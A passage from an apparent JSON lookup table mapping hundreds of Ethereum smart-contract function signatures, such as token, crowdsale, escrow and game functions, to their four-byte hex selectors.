"TTest()": "0xf41fa999", "Cosby()": "0x962ca53e", "DataAuction(address,address)": "0xc4c1d835", "decodeKYCFlag(uint128)": "0x4b9eea9b", "encodeKYCFlag(bool)": "0x420ddaa6", "thawSomeTokens(address,uint256)": "0x6d6ebb01", "subFrozen(address,uint256,uint256,bool)": "0x4c1736a0", "addFrozen(address,uint256,uint256,bool)": "0x547cbaa5", "isSpendableFrozenCell(address,uint256)": "0xe9892821", "findFrozenCell(address,uint128,uint128)": "0xfe098371", "SmartzToken()": "0x42a7a8e0", "isKYCPassed(address,address)": "0xc4a06710", "peep()": "0x0e5a6c70", "pass()": "0xa7a1ed72", "step(uint16)": "0xe38e2cfb", "prev(uint256)": "0x35671214", "era()": "0x143e55e0", "GACC()": "0xfbc00b4a", "MUSTToken(address,string,string,uint256,uint256)": "0xfca7c355", "ENCKToken(uint256,string,uint8,string)": "0xf7c3b210", "POTJ()": "0x6f4efd53", "QuantumPigBlockchain()": "0xea4099e4", "Oasis(uint256,string,uint8,string)": "0x4083c555", "RealBloq()": "0x40194596", "T0XToken()": "0xf4f0dafd", "assignToBeneficiary(address,uint256)": "0x96c108c9", "burnAndFinish()": "0x819f5e24", "getPhaseBonus()": "0x193f69a1", "setBonusPhase(bool)": "0x271bac4a", "issuePercentToReserve(address,uint256)": "0x1923a4a3", "getBonusFactor(uint256)": "0x26470ae4", "withdrawFund()": "0xe07fa3c1", "claimTokenAddress(address)": "0x47f980e5", "mintForEverybody()": "0x649efd6e", "HarborPresale(address,uint256,uint256,uint256,address,uint256,uint256,uint256)": "0x3a551c6d", "SmatrOCrowdsale(uint256,uint256,uint256,address)": "0x11f54545", "serverTransfer(address,address,uint256)": "0xbc304e55", "BRV(uint256,string,string)": "0xe4a30200", "redeemContractSentTokens(address,uint256)": "0xc1670257", "BEAT()": "0xda756ba7", "PLCCToken()": "0x582747ba", "addTokenAddress(address,address)": "0x477ff120", "OpenAIBlockChainToken()": "0x899a0e7e", "CRMTToken()": "0x70ddeb03", "IDH()": "0xc7cefbf1", "CryptotalksToken()": "0x78ce14dd", "check_flag(bytes32)": "0x9339e942", "change_flag_hash(bytes32)": "0xe993a9c0", "Challenge()": "0xa0f4a9a9", "completeOrderBySafePeriod()": "0x2fa99791", "failedByDeveloper()": "0xa37e6f69", "orderNotAccepted()": "0xb5f529cf", "completed()": "0x9d9a7fe9", "setDeveloperWallet(address)": "0x6cd56878", "SimpleEscrow()": "0xd1fa74d2", "AFTBToken()": "0x3c0b1c41", "CSNO()": "0x3dd2b811", "getAllCardDatas()": "0x9d83ee1b", "getSelfBalance()": "0x048a5fed", "getSelfCardDatas()": "0x4ab3bc23", "getAllCardByAddress(address,address)": "0xa15b4d2d", "createSaleCardToPlayer(uint256[],address,address)": "0x795b5b83", "buySaleCardFromSys()": "0x60ae1eb5", "getSalePrice()": "0x2fbc0bf1", "setSalePrice(uint256)": "0x1919fed7", "setSaleStatus(bool)": "0xd897833e", "getAllWorkers()": "0xc9c0f25e", "deleteWorkerAdress(address)": "0x8e4b0190", "setWorkerAdress(address)": "0x0bd6a40f", "Qwidex(address,address,address,uint256,uint256,uint256)": "0xda7150b9", "setMostSent(uint256)": "0x7a2ecfdb", "NomuraDynamicsCoin()": "0xa42ad8b3", "AdidasCoin()": "0xf70bdba7", "SenegalvsColombia()": "0x78d38d1a", "addBonusToken(address,uint256)": "0xd14b2f9b", "RegistrationBonus(address)": "0xfd645193", "duel(address)": "0x853df275", "adminPayout(uint256)": "0xac12319d", "adminSetBlock(uint256,uint256)": "0x6913d82d", "adminSetDuel(uint256,uint256)": "0x2fe9950e", "adminSetDiv(uint256)": "0xe4f06100", "YOBTC()": "0xb5ea510a", "finish(address,address,address,address)": "0xe76b8126", "setNowTime(uint256)": "0x8c17c5ab", "freezeMultipleAccounts(address[],bool[])": "0x2a76a169", "issueToMany(address[],uint256[])": "0x6a625bc8", "UNIQ(uint256,string,string)": "0x5eac1414", "NCCUyen()": "0x8b28df17", "PI_EDIT_4()": "0x80dbde63", "refundICO(address)": "0xab5db036", "setBonusState(uint256)": "0xd08d66ec", "DNMC()": "0xf17ccd73", "SMARTGold()": "0xe1345b02", "Payreum()": "0xebc66bac", "setReserveForFoundersSecond(address)": "0x91a1896e", "setReserveForFoundersFirst(address)": "0x6b9b2679", "setReserveForCompany(address)": "0xe7ca1343", "tokensSupply()": "0x2bdad637", "dateMove(uint256)": "0x5f330669", "usersPause()": "0x88416792", "sendTokens(uint256,address)": "0x29322e05", "calculateStagePrice()": "0xcf98e120", "getStageId()": "0x8d9afc0f", "withDrawal()": "0x73932bfd", "Crowdsale(address,address,address,address)": "0x357a05f1", "PAXToken(address,address,address,bool)": "0x6e929838", "sendToken_internal(address,uint256)": "0x5ee7b392", "DistributedSoFar()": "0x31798893", "setAmountToDistribute(uint256)": "0x9835efaf", "balanceOfTheContract()": "0x712a5094", "CoinDogToken()": "0x5dcf451b", "LimingCoin()": "0xcd67f3bc", "MultiTransferETH(address[],uint256[])": "0x142b353d", "HealthDataChain(uint256,string,string)": "0xcec0213e", "NEX()": "0x718aa629", "WIKICOIN(uint256,string,uint8,string)": "0x99694cf2", "PRVTSToken()": "0xcdfb0a21", "isValidated(address)": "0x0b91eaf9", "setVerifier(address,bool)": "0xac9b5671", "updateMinimumInvestment(uint256)": "0x6418345e", "rejectRequest(address,uint256)": "0x6859dc10", "revokeRequest()": "0xe85501d8", "pendingTransaction(address)": "0x169c13ed", "validateTransaction(address)": "0x8fa3a84c", "requestTokens(address)": "0x580f3904", "EpigenCareCrowdsale(uint256,uint256,uint256,address,address,address)": "0x03d6b6b4", "splitPayment()": "0x325cf9e6", "changeEtherVault(address)": "0x598d772a", "CrowdSale(address,uint256,uint256)": "0xd6a2a596", "SAKECOIN()": "0xb4396d42", "KyberHandler(address)": "0xcf7209c5", "TestChain()": "0x285fc97f", "getinfo()": "0x1a2d8629", "Marcela_Birthday(string,string,string,string)": "0xe6bc2cc9", "Elythrium()": "0x42b31b1f", "PeopleSeedCapitalCoin()": "0xcf4d3a88", "SkychainToken()": "0xe4062df5", "AFFBToken()": "0xeac046ce", "changeBoolean()": "0x7f205f02", "Deedcoin()": "0xb9138584", "freezeAccountOf(address)": "0x12ecaa62", "freezeAccountToken(address,uint256,uint256)": "0x4257347e", "getNumberOfSuccessfulSteps()": "0x17c2f390", "removeStep(bytes16)": "0xc8a48d71", "confirmOrderCompletionByPatient(bytes16,bool)": "0x7545c449", "confirmOrderCompletionByDoctor(bytes16,bool)": "0x6929dd0b", "confirmOrder(bytes16)": "0xab27d755", "acceptOrder(bytes16)": "0x6d102f71", "placeOrder(bytes16,address,address,uint256)": "0x61f70161", "getStep(bytes16)": "0x3d16991a", "setFeeAmount(uint256)": "0x6b392680", "njbToken()": "0x11789bec", "zasxzasxqaq()": "0x672d2921", "reading_cards()": "0x49137bca", "X4BToken()": "0xce816706", "internalMintToken(uint256)": "0xf409a609", "setTokenCap(uint256)": "0x2854bc7e", "enableMintToken()": "0x0ee526e0", "XYZA()": "0x7a766210", "getCandidateNumberList()": "0x797d660f", "getCandidate(uint256)": "0x35b8e820", "setCandidate(uint256,string,string)": "0x38039479", "getVoteNumberList()": "0x58c8c0a7", "setVote(uint256,uint256)": "0x57796e1c", "unfreezeFrom(address,uint256)": "0x61bdc978", "freezeFrom(address,uint256)": "0x9549c330", "NPTToken()": "0x2bf81dd3", "RepeatCustomerToken()": "0xd3b58024", "SHORTADDRTOKEN()": "0x37334878", "wtech()": "0x265d900b", "dispute(bool)": "0x91ee7bbf", "SnowdenAffect()": "0x319f9887", "record(string,string,string,bool,string,string,string)": "0x882e9709", "BogpillToken()": "0x8a585214", "MaiToken2()": "0xcdeb7bac", "setICOAddress(address)": "0x8348bfb9", "getGoldBackedByEachToken()": "0x9919c9cf", "CURRENSEE(address,address,address)": "0x6ebc6200", "setFeesMaxUptoCoin(uint256)": "0x8f8336b7", "setFeesDistributionPercentages(uint256,uint256,uint256)": "0x71254d9b", "setTokensUsedForReinvestment(uint256)": "0x687c317c", "setCurrenseeFoundationAddress(address)": "0xbf48d8b5", "setReinvestmentAddress(address)": "0xdf48a2b0", "mine_jade()": "0x3c5bd949", "check_the_rule(address)": "0x884f3db0", "check_ptc_num(address)": "0x151e2a0a", "update_power()": "0xd5f404c7", "mine_jade_ex(uint256)": "0xa04b3c2d", "get_ptc_balance(address)": "0xcead2c29", "NEOToken()": "0x904b46a1", "topiToken()": "0x71c9a754", "SUAppToken(uint256,string,string)": "0xb4a3208a", "BNB(uint256,string,uint8,string)": "0x97734b85", "EtherSteem()": "0x55a53ed0", "broadcastOpinion(string)": "0x805c2b6c", "getCurrentOpinion()": "0x5f1d90ae", "SoapBox()": "0xb0ba621a", "DarkrenlandCoin()": "0xcea15706", "applyRate(uint256,uint256)": "0x5840f4ec", "rcn()": "0x1a7facff", "identifierToIndex(bytes32)": "0x32564d82", "CCCCCToken(address)": "0x27eea9cd", "GolemToken()": "0xce21fbf4", "AariTestToken()": "0x75bae755", "RangeToken()": "0x3013ad89", "getAdPriceMultiple()": "0xa1e8a780", "getAdPriceWeek()": "0xa493b39f", "getAdPriceDay()": "0x481ef4fd", "getAdPriceHalfDay()": "0x38a4ba0b", "getAdPriceHour()": "0xa4036b1c", "getInvestmentMin()": "0x3e4c9534", "getTheInvestor()": "0x097e8fad", "getPurchaseSeconds()": "0x7e55a311", "getDappId()": "0xcccc8f91", "getLastOwner()": "0x8b81b1af", "getPurchaseTimestamp()": "0x4335dfc0", "payEther()": "0xf7474d00", "Demo()": "0x2546559c", "JumpCoin()": "0x02bf7fe7", "arbitroAprovaPagamento(bool)": "0x98a05cfb", "aprovaPagamento(bool)": "0xe5fe3d7a", "solicitaPagamento(uint256)": "0x2bc8ba53", "depositaCaucao()": "0xaab27ad1", "ownerHistoryEntry(uint256,uint256)": "0xca3c9147", "ownerHistoryCount(uint256)": "0xd715c8b2", "recordNewOwner(uint256,address)": "0xa104e5e1", "create(uint256,string,address)": "0x0d058fe3", "ObitanChainxToken()": "0xd02ecbb5", "plxToken()": "0x33731c04", "RentaCoin()": "0x13c1e906", "OmegaNode()": "0xd59f5c6e", "initialize(uint256[],uint256[],uint256,address,uint256,address)": "0x38dbb74a", "currentlyActive(bool)": "0x22d1bd32", "BETX()": "0xc8162497", "GOLDT()": "0x7845cbef", "bankuToken()": "0xe877e541", "rublaJEPoken()": "0xcc638e03", "MyPinerTokenTest2()": "0xd1a7d1a8", "ZeusCoin()": "0x868d2b62", "refundTokens(address,address)": "0x57f1935f", "_claimRewardBlank(address,string)": "0x8fc9bff6", "_claimReward721(address,string)": "0xb8174685", "getMinLockedAmount(address)": "0x74ad74e9", "unlockAllTokens()": "0x5e0be607", "resumeAirdrop()": "0x3902d417", "stopAirdrop()": "0x4f4e47f1", "resumeBuy()": "0x0ab880e5", "Santal()": "0xd7955eaf", "COINLAW()": "0xbf0d51be", "Biograffi()": "0x95b25a1c", "TravelZediToken(uint256,string,uint8,string)": "0x4b5f2fa4", "StealthToken()": "0x8033cc70", "initialWeiRais(uint256)": "0xde718e3f", "MSERToken(uint256,string,string)": "0xc35e1b33", "withdrawStakeTokens(uint256)": "0x726ee493", "setHouseEdge(uint256)": "0x6cd0f102", "addNewStakeDiceGame(uint256)": "0x740ed4e0", "createDefaultGames()": "0x4cff7a82", "amountOfBets()": "0x3348904b", "amountOfGames()": "0x4d5fc38a", "_cancelBet(uint256)": "0xd907e02e", "betPlaced(address,uint256)": "0xd851eb5d", "totalUniquePlayers()": "0x8a609155", "playerAmountOfBets(address)": "0x6a9db57a", "withdrawStakeTokens(uint256,address)": "0x05a10e6d", "setWinningChance(uint256)": "0x58708479", "maximumBet()": "0x227cade5", "multiplierOnWin()": "0x0d81057e", "getAllowedAmountToContribute(address)": "0x8d72920b", "listAddresses(bool,bool,bool,bool,address[])": "0x32fac3a3", "setAddressesThatCanList(bool,address[])": "0x5455e1b8", "changeMaximumValueWithoutProofOfAddress(uint256)": "0xeb3c8d7d", "changeMaximumValueDuringGuaranteedPeriod(uint256)": "0x915f3209", "AuctusWhitelist(uint256,uint256)": "0x56b49ef0", "beginContinuousSale()": "0xe83f682a", "setEndRate(uint256)": "0xdfb87be1", "setInitialRate(uint256)": "0xabe3dfd1", "setBuyerRate(address,uint256)": "0x467523fa", "createContinuousSaleContract()": "0x0da4f991", "MANACrowdsale(uint256,uint256,uint256,uint256,uint256,address)": "0xcd15c6ab", "checkContinuousPurchase(uint256)": "0x2052de16", "prepareContinuousPurchase()": "0x2f56dc5f", "recoverTokensTo(address,uint256)": "0x73c74103", "getUserAddressById(uint256)": "0x8a03ad86", "getNextUserId()": "0x1c54e565", "balanceTotalOf(address)": "0xd9c1a344", "getMyMoney()": "0xd7c9a0e3", "_register(address,uint256,address)": "0xaeccee75", "Bithumb(uint256,string,string)": "0xe0f771c9", "tokenCollectedOf(uint256,address)": "0x7e08a846", "isTokenCollected(uint256,address)": "0x8e045031", "periodContributionOf(uint256)": "0x887699f3", "contributionOf(uint256,address)": "0x6813947f", "goTokenCollection()": "0x2d04d07d", "goNextPeriod()": "0xdc7e5762", "addPeriod(uint256,uint256)": "0x60393a55", "setPeriodStart(uint256)": "0xabfc99a8", "initTokenSale(address,address,uint256,uint256,uint256,uint256,uint256)": "0x7ba7acc9", "emulatePurchase(address,address,uint256,uint256,uint256)": "0xcf8a24de", "ZenomeSale(address,address,uint256)": "0x5b863b5a", "CappedBonusSale(uint256)": "0x55642cf9", "MyCoin()": "0xaa1e47ae", "isAreaEnabled(string)": "0xb5fbc49f", "enableArea(string)": "0x335b61e8", "getPriceRiseAndFeePercent(uint256)": "0xb434486a", "getAreaIndex(string)": "0x1c4c710b", "getAreaOwner(string)": "0x533da8df", "getSoldAreasCount()": "0x2a6e3803", "buyFromOwner(string)": "0xdfa22fed", "firstBuy(string)": "0x8757d620", "Etharea()": "0x9aecfb8a", "userRollDice(uint256,address)": "0xc4270574", "airdrop(uint256,address[])": "0xbdf7a8e6", "updateTokenContract(address)": "0x989ced26", "RedSoxRays48()": "0x4e13f066", "Yuri()": "0x34b8b690", "KozzProjectToken()": "0xfdced779", "SPTI()": "0x17548962", "DiscourzeToken()": "0xe12f670f", "CHSC()": "0x2457d765", "ownerOverride(uint256)": "0x791dd41c", "ownerClaimOverride(uint256)": "0x03ddc104", "ownerRevealOverride(uint256)": "0xf2e998df", "ownerAbandonOverride(uint256)": "0x72f3b3c4", "claimRewardK(uint256)": "0xcace7bd3", "ethTransfer(uint256,address,uint256)": "0x3f635e30", "joinGame(uint256,uint256,bytes32)": "0x5b99cb2b", "startGame(uint256,bytes32)": "0xbfb51ac9", "getTotalGamesParticipated()": "0xd91aee02", "getTotalGamesStarted()": "0x7231af39", "getPlayerState(uint256)": "0xec7ecec5", "getGameState(uint256)": "0xffde0c74", "getGameRules()": "0xcb859c09", "getRewardMatrix()": "0xee42c2d9", "getContractEarnings()": "0xb138d838", "setGameRules(uint256,uint256,uint256,uint256)": "0xf2634485", "setRewardPercentageK(uint256)": "0x77faba66", "unSuspend(address)": "0xd8be2838", "transferEarningsToOwner()": "0x345e2f91", "FixBet16()": "0x38689772", "Jade()": "0x1f4dde9f", "checkIfAllIQTDistributed()": "0x6cee0d8b", "releaseJoyToken()": "0x17f80c13", "authorityAddress()": "0x3c695d4e", "accountslength()": "0x0354d6c5", "_prizeAmount()": "0x0ccf5af4", "covmanAddress()": "0x58144fbd", "MINI_GAME_ADD_TIME_DEFAULT()": "0xcb9a20d0", "dollarPrice()": "0x40d7b7b8", "RATE_DAY_1()": "0x34e41bbf", "muscFund()": "0x0d1cf200", "minAllowedBetInTokens()": "0x9840a8f8", "Rate2()": "0x29e67fce", "massTeamMsgHash()": "0xe72fee5d", "PRICE_SALE()": "0x0e80d8b9", "SHARDING_REWARD()": "0xcd836e15", "ethSent()": "0xeca38e0c", "stopForce()": "0xd656a794", "makeLive()": "0x90e7760e", "EmergencyStop()": "0x4e97bcfc", "EMISSION_FOR_SALESTAGE7()": "0x8bf74527", "paymentEscrow()": "0xa292f7d3", "BitcoinGreen()": "0xbec823c6", "officialLimit()": "0x873c56d7", "totalDevelopmentFundEarned()": "0x12038a01", "MiCarsICO()": "0xdd7f2225", "auctionleader()": "0xed49196b", "maxCapTokens()": "0xbc6f9021", "INCENT_FUND_NON_VESTING()": "0x4e284af1", "isDistributionReady()": "0x44440a59", "emitTokensSince()": "0xf416d2cb", "ICOBonusPercent1week()": "0x6ee0400d", "famedStarAddress()": "0xf170c83c", "icoTokenSupply()": "0xc94e7b5c", "largestRetro()": "0x2a2b48f5", "unsoldAllocationOraclizeGasLimit()": "0xa9c6c714", "YOO_UNIT()": "0x67a1d653", "bountyAllocated()": "0x1bc59aa6", "MAX_CROWD_SALE_TOKENS()": "0x2d290d8b", "usedTokens()": "0x3373739b", "Drawer()": "0x2aaee1a5", "investedSumOnPreIco()": "0xdd22148f", "IcoPrice()": "0xd8070c40", "SELL_HARD_LIMIT()": "0x79bc46b3", "ColaTokenToken()": "0x55173bb1", "levelThreeBonus()": "0x710908c9", "rewardPercentageDecimals()": "0x0ca5f72f", "maxInvest()": "0x3110235a", "Total_ICOSupply()": "0xeacb05d8", "maxRegistrants()": "0x18bb2edb", "dat()": "0x63eb963a", "tokenBuyCost()": "0x4eee8c25", "returnAddressList()": "0xa65a26e8", "raiseethamount()": "0xf9888687", "dapCarToken()": "0xa8181851", "CROWDSALE_CAP()": "0x55d17251", "removeEmployeesWithExpiredSignaturesAndReturnFadeout()": "0x79b45b18", "_batch4_icosaleStartTimestamp()": "0x2cb51970", "isMinTokensReached()": "0x5b6aa3c2", "hourPot()": "0x0ea662ea", "startOperation()": "0xd5afd6bc", "FOURTH_RATE()": "0xa8b981d3", "Start9()": "0x6c16c740", "Product()": "0x75d3bda6", "node()": "0xd70754ec", "lastEpochTX()": "0xe3b5a153", "unitsOneEthCanBuyafter()": "0xc6c39bda", "forcedRefund()": "0xdba2d875", "preCrowdsaleContractAddress()": "0x0238777f", "EthGet()": "0xf4577298", "stakeRemainingToVote_Eth()": "0x64e08644", "resolved()": "0x3f6fa655", "FactomIssued()": "0xe47a192e", "objectPants()": "0x05018d91", "exponent()": "0x52f6ee58", "saleDeposit()": "0xb344e002", "innerScope()": "0xf3a3bef4", "Tier_Rainmaker()": "0xa432cdb0", "START_WEEK_3()": "0x4d73452e", "costToCreateGame()": "0x726aeb20", "nominatedOwner()": "0x53a47bb7", "LA_wallet()": "0x2b2e76f3", "preBuy1()": "0x27c1f423", "MICRO_DOLLARS_PER_BNTY_MAINSALE()": "0xccb61dad", "multisigFunds()": "0x5a9448e2", "PatronThreeWithdrawal()": "0xf19674f6", "endPreIcoDate()": "0x37624204", "ORACLIZE_GASPRICE_GWEY()": "0xd03e1021", "issuanceRatio()": "0xb410a034", "rewardPoolPercentage()": "0xb85cf54e", "addressOfTokenUsedAsReward5()": "0xa1903737", "LARGE_PURCHASE_BONUS()": "0x8e885cbb", "firstAuctionsStartDate()": "0xeb34c173", "buyMultiplier()": "0x3121c7c0", "HXTtoken()": "0x74cd5a31", "icoHolder()": "0xa2ebb20b", "pixelPrice()": "0xffb87173", "saleover()": "0x21129137", "presaleDateStart()": "0x48e37220", "claimProxy()": "0x30b66cee", "welcome()": "0xb627cf3b", "withdrawDate()": "0x59c39094", "CrowdsaleTokenExt(string,string,uint256,uint256,bool,uint256)": "0x2682a0ac", "setReservedTokensListMultiple(address[],uint256[],uint256[],uint256[])": "0xf05834d6", "getReservedTokensListValInPercentageDecimals(address)": "0x0f7c932a", "getReservedTokensListValInPercentageUnit(address)": "0xaef37284", "getReservedTokensListValInTokens(address)": "0x338f43a0", "setReservedTokensList(address,uint256,uint256,uint256)": "0x005ef4ec", "UpgradeableToken(address)": "0xf49259b7", "upgradeFrom(address,uint256)": "0x753e88e5", "isUpgradeAgent()": "0x61d3d7a6", "isBreakingInvestorCap(address,uint256)": "0x045b1a0c", "setStartsAt(uint256)": "0xbf5fc2ee", "updateJoinedCrowdsalesMultiple(address[])": "0x04fc7c6d", "clearJoinedCrowdsales()": "0x831ed348", "setLastCrowdsale(address)": "0x57dc2658", "updateJoinedCrowdsales(address)": "0xdee846c5", "updateEarlyParicipantWhitelist(address,address,uint256)": "0xd245da28", "setEarlyParicipantsWhitelist(address[],bool[],uint256[],uint256[])": "0x79e0f59a", "setEarlyParicipantWhitelist(address,bool,uint256,uint256)": "0x0cc91bb9", "isPresalePurchase(address)": "0xf14ae17d", "divides(uint256,uint256)": "0xa12f69e0", "test_percPoints()": "0xf8579af8", "test_percOf2()": "0x1e7c402b", "test_percOf1()": "0xa38591fc", "test_validPerc()": "0xf740fbc9", "getNewCoinsIssued(uint256,uint256,uint256)": "0xea770a4c", "getBondMultiplier(uint256,uint256)": "0xa47905cd", "getNumber()": "0xf2c9ecd8", "clearArray()": "0xe80b7ab6", "getLengthOfMatches()": "0x2367e1ae", "getMatch(uint256)": "0x3d092b3d", "findBest()": "0x8c66c9fc", "swap(uint256,uint256)": "0xd96073cf", "bubbleSort()": "0x0b30ab4f", "addMatch(uint256,uint256)": "0x3991c09d", "askForMatch(uint256)": "0xd8523fc2", "Match()": "0x3a47de24", "setDefinition(uint8,uint8,uint8,uint8,uint8)": "0x4e705549", "isDefValid(uint8,uint8,uint8,uint8,uint8)": "0x3e709982", "isDefIndexInRange(uint8)": "0x2540424b", "isDefValueInRange(uint8)": "0x33dfe91d", "ArtIs()": "0xbd183430", "confirm(string,int256)": "0x291bd15c", "setQuantity(string,int256)": "0x8d8660bc", "confirmFriendship(string)": "0xf3611719", "Lendr(string,string,address)": "0x84be4079", "StandardToken(uint256)": "0x0278199e", "approveOnce(address,uint256)": "0x930b7a23", "setOutcome(int256,uint8,bytes32,bytes32)": "0xd9bf3187", "replaceSigner(address,uint256,uint8,bytes32,bytes32)": "0x5011e399", "SignedMessageOracle(bytes32,uint8,bytes32,bytes32)": "0x20572943", "setDepositAddressVerify()": "0x90fd67fc", "getContributionOf(address)": "0xe14ed045", "attemptSpend(uint256)": "0xb349f6c7", "DayLimitMock(uint256)": "0x2a3602b2", "getTopMigrationDestination()": "0x46488459", "getBranch()": "0xea8ef6be", "trustedTransfer(address,address,uint256)": "0x0fb66557", "migrateFromLegacyRepContract()": "0x3a15e7ca", "migrateIn(address,uint256)": "0xa0c1ca34", "addThing(string,string,bytes32,string)": "0xf6ba3b6c", "canWrite(address,bytes32)": "0x0912fabd", "canRead(address,bytes32)": "0xa7b88506", "getWriterId(bytes32)": "0x9c58b753", "getReaderId(bytes32)": "0xd3a70dba", "setWriterId(bytes32,bytes32)": "0x51f4ec50", "setReaderId(bytes32,bytes32)": "0x75a4894b", "getHash(bytes32)": "0x3cf5040a", "setHashByProvider(bytes32,bytes32)": "0xff8fec7f", "setHashByWriter(bytes32,address,bytes32)": "0xddfd72f8", "isAllowCnsContract(address,bytes32,bytes32)": "0x156c6baf", "removeAllowCnsContract(bytes32,address,bytes32)": "0xb24cb812", "addAllowCnsContract(bytes32,address,bytes32)": "0x408318ae", "isActive(bytes32)": "0x5c36901c", "remove(bytes32)": "0x95bc2673", "create(bytes32,address,bytes32,address,bytes32)": "0x37668a8b", "Advanced_Anemoi(uint256,string,string)": "0x1e372dd3", "Anemoi(uint256,string,string)": "0x8c308a71", "increaseCount(bytes32)": "0x41585a0c", "ShareableMock(address[],uint256)": "0x50c6784d", "askOracle()": "0xed6f0792", "BurnableTokenMock(address,uint256)": "0x7c194295", "SampleOffer(address,bytes32,uint256,uint256,uint256)": "0xb541a778", "addThing(bytes32,string,string,string)": "0xc25f1901", "getFinalval()": "0x1ff8ac8a", "getUint80val()": "0xab98458e", "getInitialval()": "0x3515519c", "convertMsgValueToBytes20()": "0x988483d4", "validPurchase()": "0xf15a691d", "CappedCrowdsale(uint256)": "0x49d94c83", "GxDeploymentAdmins()": "0x3d5b2b4e", "_resetSpentToday()": "0x4a4c82c6", "_setDailyLimit(uint256)": "0xe7dde9a3", "DayLimit(uint256)": "0x2aa5ed61", "ThrowProxy(address)": "0xdfaeaf67", "getOwnerInfos()": "0x8a6281f6", "defrostToken()": "0xcb899024", "Peculium()": "0x6658238c", "months(uint256)": "0x1d0205b8", "collectTokens()": "0x8433acd1", "DevTokensHolder(address,address,address)": "0x62dbc55c", "Backdoor()": "0x8d715d9d", "setBytes(bytes32)": "0xe6748da9", "setUint(int256,uint256)": "0xabb743c8", "getBool2()": "0x48378eea", "setBool2(bool)": "0xecc55e4b", "transferDomainBackToSeller(string)": "0xf2759ee2", "transferDomainToBuyer(uint64)": "0x58057d81", "reject(uint64,string)": "0xd9971e92", "drawFundsAfterTransfer(uint64)": "0xc9d7d862", "withdrawEscrow(uint64)": "0x0b59df68", "withdrawTip(uint256)": "0x4811647c", "scavengeEscrow(uint64)": "0x969ca0eb", "escrowDeed(uint64)": "0xff37d31d", "startEscrow(string,uint256,uint64)": "0xe3aa3fbb", "nextEscrowId()": "0x89cb29dd", "getAdminInfo()": "0xc3d5fd39", "recordEscrowOnBid(uint64,uint64)": "0x0d53b406", "getBidInfo(uint64)": "0xba56763e", "getPacket(uint256)": "0xa59455dc", "appendPacket(bytes)": "0x1cc1e7bc", "sendPacket(address,bytes)": "0x6c043773", "Uint256Oracle(int256,uint256)": "0x816ffbab", "getStats()": "0xc59d4847", "disablePurchasing()": "0x64acdb77", "enablePurchasing()": "0x8f580996", "blub()": "0x3d6571e5", "duper()": "0x59249c46", "BrownieCoin()": "0x6c843605", "UTCoin()": "0x2ddae32d", "setSaleDepositsAllowed(bool)": "0xde2b4473", "sendTokensAndRefund(address)": "0xdb422e0b", "ownerClaimTokensAndRefundForUser(address)": "0xc3f53e94", "claimTokensAndRefund()": "0xd956634f", "RocketPoolCrowdsale(address)": "0x256c0926", "updateItemPrice(bytes32,uint256)": "0x1392c495", "addItemToUserDebt(address,bytes32)": "0x530dfad3", "addItemToMenu(bytes32,uint256)": "0x79ef6858", "addStaff(address)": "0x522e4c8a", "Kitchen()": "0xdbe3071a", "createKycData(address,string,string,uint256,uint256,string,string,string,string,int256,uint256)": "0xcb28c716", "getAccountDetails(uint256)": "0x2a0b2617", "withdrawAmount(uint256,uint16)": "0xaf84fb00", "DepositAmount(uint256,uint16)": "0x500c6755", "createAccountWithBalance(string,uint16)": "0x494e49a4", "UpdateSavingsBank()": "0xeef5bfae", "changeMinter(address)": "0x2c4d4d18", "takeBalance(address,address,uint256,address)": "0x27234ecc", "notification(address,uint256)": "0x76147a0e", "FathomToken(address,address,uint256,address)": "0xb634fc77", "EVMScriptRegistryFactory()": "0xed3fd0d7", "complex()": "0xa49e0ab1", "run(address)": "0x522bb704", "m_software(uint256)": "0xc9a43b2b", "SearchByGit(bytes)": "0x19c55a31", "AddSWAndClaim(string,string,bytes32,bytes32,bytes32,string,bytes32,bytes32,address,uint32)": "0x67975213", "AddClaim(uint32,string,bytes32,bytes32,address,uint32)": "0x4e1243b6", "AddSoftware(string,string,bytes32,bytes32,bytes32)": "0xd1ab0457", "GetClaimCount()": "0xbb3d5af2", "GetSoftwareCount()": "0xe5393f25", "spawnChild(string)": "0x45fbe9cb", "oracleItCallbackAddress()": "0xf2416f64", "oracleItQuery(uint256,string,string,string,uint256,uint256)": "0xc9b0eef4", "oracleItQuery(string,string,string,uint256,uint256)": "0x24f481c8", "oracleItQuery(uint256,string,string,string)": "0xf2505211", "oracleItQuery(string,string,string)": "0xd3f6dc52", "oracleItQuery(uint256,string,string,uint256,uint256)": "0xa4268de6", "oracleItQuery(string,string,uint256,uint256)": "0xd34d8e43", "oracleItQuery(uint256,string,string)": "0xe66f7bba", "oracleItQuery(string,string)": "0x1c6f634e", "oracleItSetNetwork()": "0xd6cf5297", "getPrice(bytes32)": "0x31d98b3f", "query(uint256,bytes32,string,string,uint256,uint256)": "0x1d2c1b59", "ERC20Token(string,string,uint8)": "0x4fea572e", "killWallet()": "0xb67ba1b5", "isAllowedToSend(address,address)": "0xa29dbf46", "disallowAddressToSendMoney(address,address)": "0x081ce187", "allowAddressToSendMoney(address,address)": "0x78c70a4e", "getWithdrawalForAddress(address,address,uint256)": "0x6edf1cc4", "getAmountOfWithdrawals(address,address)": "0xc9b110cb", "sendFunds(uint256,address)": "0xb2686774", "Leonidas()": "0xa4ba5bdb", "createGroup(address,bytes32,address[])": "0x3c673470", "advSend(address,uint256,bytes)": "0x668fde45", "sweep(address)": "0x01681a62", "payDividend(uint256,uint256)": "0xe89d7f23", "payDividends(uint256,uint256,uint256)": "0xad9abf32", "addShareholder(address,uint256)": "0x75724990", "SmartexFundsManager()": "0x41dbbb61", "setDebt(uint256,address)": "0x88ebf975", "Provider(string,string)": "0x2c9cdfd9", "unsubscribe(address)": "0x7262561c", "payToProvider(address)": "0x3d65ecdf", "setDebt(uint256)": "0x7dbf67a7", "registerToProvider(address)": "0x23cd5090", "User(string)": "0xd226ff1b", "_self()": "0x273a041c", "create(uint256,string,uint8,string)": "0xd74a99d4", "removeBet(string,uint256)": "0x78e8356c", "getBetsByCategory(string)": "0xf2f977a7", "toggleFeatured(uint256,string)": "0xafe4720c", "releaseImpl(uint256)": "0x40135913", "checkCanRelease(bool,uint256,uint256)": "0xd7a08641", "Tronix()": "0xa5f11474", "convertAddressFormat(address[8])": "0xc510dfeb", "orderUsable(address[8],uint256[6])": "0xd375b921", "setAllowance(address)": "0xee20e784", "ZeroExHandler(address,address)": "0x5b556bf0", "ZeroExExchange(address,address)": "0x3da5d173", "tourisToken()": "0x13a460b7", "BigToken()": "0x137baa2a", "refreshPublicFundingTime(uint256,uint256)": "0x4dd83cb1", "refreshRate(uint256)": "0x0cf1dafc", "addPublicFundingWhiteList(address[])": "0xab96d498", 